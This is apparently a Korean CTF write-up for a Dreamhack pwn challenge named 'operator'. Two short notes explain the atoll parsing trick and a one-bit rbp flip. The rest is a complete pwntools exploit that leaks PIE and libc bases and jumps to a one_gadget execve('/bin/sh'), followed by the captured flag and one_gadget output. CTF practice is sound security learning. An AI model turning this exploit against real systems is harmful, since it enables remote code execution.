풀이

  • atoll이 유효한 바이트까지만 읽는다. -> 이를 이용해서 숫자 넣는 곳에 one_gadget을 넣을 수 있다.
  • rbp offset 7을 1bit flip 하면 과거에 써놨던 one_gadget의 주소로 점프할 수 있다.
from pwn import *

context.log_level = "debug"

# io = process("./operator", env={"LD_PRELOAD": "./libc.so.6"})
io = remote("host8.dreamhack.games", 9771)
libc = ELF("./libc.so.6", checksec=False)
e = ELF("./operator", checksec=False)


one = [0xEBCF1, 0xEBCF5, 0xEBCF8, 0xEBD52, 0xEBDA8, 0xEBDAF, 0xEBDB3]


io.sendafter(b">> ", b"1")
io.sendafter(b">> ", cyclic(0x1000))


io.sendafter(b">> ", b"1")
io.recvuntil(cyclic(0x1000))
pie = u64(io.recvn(6).ljust(8, b"\x00")) - 0x2008
log.info(f"code base: {hex(pie)}")


io.sendlineafter(b">> ", b"2")
io.sendlineafter(b">> ", b"2")
io.sendafter(b": ", b"48")
io.sendlineafter(b": ", b"6")

io.recvline()
io.recvline()
libc_base = u64(io.recvn(6).ljust(8, b"\x00")) - 0x620D0
log.info(f"libc base: {hex(libc_base)}")


io.sendline(b"1")
io.sendlineafter(b">> ", b"\x00" * 0x300)


io.sendline(b"2")
io.sendlineafter(b": ", b"40")
io.sendafter(b": ", b"7" + p64(pie + 0x4150)[1:] + p64(libc_base + one[1])[:-2])


io.sendline(b"0")


io.interactive()
# DH{ac9becb710055fcb6b67bfe1c1ee3f2c5a24a04c5ca8d22f77665ac525579f4d}

"""
0xebcf1 execve("/bin/sh", r10, [rbp-0x70])
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL || r10 is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebcf5 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL || r10 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xebcf8 execve("/bin/sh", rsi, rdx)
constraints:
  address rbp-0x78 is writable
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xebd52 execve("/bin/sh", rbp-0x50, r12)
constraints:
  address rbp-0x48 is writable
  r13 == NULL || {"/bin/sh", r13, NULL} is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xebda8 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x48 is writable
  r12 == NULL || {"/bin/sh", r12, NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebdaf execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x48 is writable
  rax == NULL || {rax, r12, NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebdb3 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x50 is writable
  rax == NULL || {rax, [rbp-0x48], NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
"""